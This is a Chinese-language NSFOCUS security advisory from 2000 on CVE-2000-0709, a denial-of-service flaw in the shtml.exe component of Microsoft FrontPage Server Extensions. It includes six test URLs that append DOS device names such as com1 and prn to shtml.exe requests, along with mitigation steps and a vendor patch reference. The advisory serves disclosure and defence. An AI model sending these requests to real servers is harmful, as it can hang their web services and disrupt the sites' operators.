首页 -> 安全研究

安全研究

安全漏洞
Microsoft FrontPage服务器扩展shtml.exe远程拒绝服务攻击漏洞

发布日期:2000-08-23
更新日期:2000-08-23

受影响系统:
Microsoft FrontPage 2000 Server Extensions 1.1and previous
    - Microsoft Windows NT
    - Microsoft Windows 98
    - Microsoft Windows 95
    - Microsoft Windows 2000 SP3
不受影响系统:
Microsoft FrontPage 2000 Server Extensions 1.2
    - Microsoft Windows NT
Microsoft FrontPage 2000 Server Extensions 1.2
    - Microsoft Windows 98
Microsoft FrontPage 2000 Server Extensions 1.2
    - Microsoft Windows 95
Microsoft FrontPage 2000 Server Extensions 1.2
    - Microsoft Windows 2000 SP3
描述:
BUGTRAQ  ID: 1608
CVE(CAN) ID: CVE-2000-0709

FrontPage服务器扩展是Microsoft的一个产品,包括PWS和IIS版本,可以让网页设计人员方便的直接用FrontPage直接连接到PWS或者IIS上进行网页创作。shtml.exe是FrontPage服务器扩展的组件之一。

shtml.exe存在一个设计失误,远程攻击者可以利用此漏洞对服务器进行拒绝服务攻击。

FrontPage服务器扩展存在一个远程拒绝服务漏洞,可能远程关闭一个Web站点上的所有FrontPage操作。通过向shtml.exe提交一个包含DOS设备名(譬如con、aux、prn等)的链接请求,FrontPage 服务器扩展会挂起,不再响应后续的请求。为了恢复正常工作,必须重新启动IIS或者重新启动机器。

<*来源:sozni (sozni@xato.net
  
  链接:http://www.xato.net/reference/xato-082000-01.htm
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

sozni (sozni@xato.net)提供了如下测试方法:

提交这样的链接,都可能使FrontPage Server Extensions停止响应:

http://www.example.com/_vti_bin/shtml.exe/com1.htm  
http://www.example.com/_vti_bin/shtml.exe/prn.htm
http://www.example.com/_vti_bin/shtml.exe/aux.htm
http://www.example.com/_vti_bin/shtml.exe/prn.anything.here.htm
http://www.example.com/_vti_bin/shtml.exe/com1.asp
http://www.example.com/_vti_bin/shtml.exe/com1.

建议:
临时解决方法:

如果您不能立刻安装补丁或者升级,NSFOCUS建议您采取以下措施以降低威胁:

* 如果不需要使用shtml.exe,请删除或者移出WEB目录。

厂商补丁:

Microsoft
---------
微软已经发布了FrontPage Server Extensions 1.2版,它解决了这个问题:

http://msdn.microsoft.com/workshop/languages/fp/2000/winfpse.asp

浏览次数:7059
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障
关于我们
公司介绍
公司荣誉
公司新闻
联系我们
公司总部
分支机构
海外机构
快速链接
绿盟云
绿盟威胁情报中心NTI
技术博客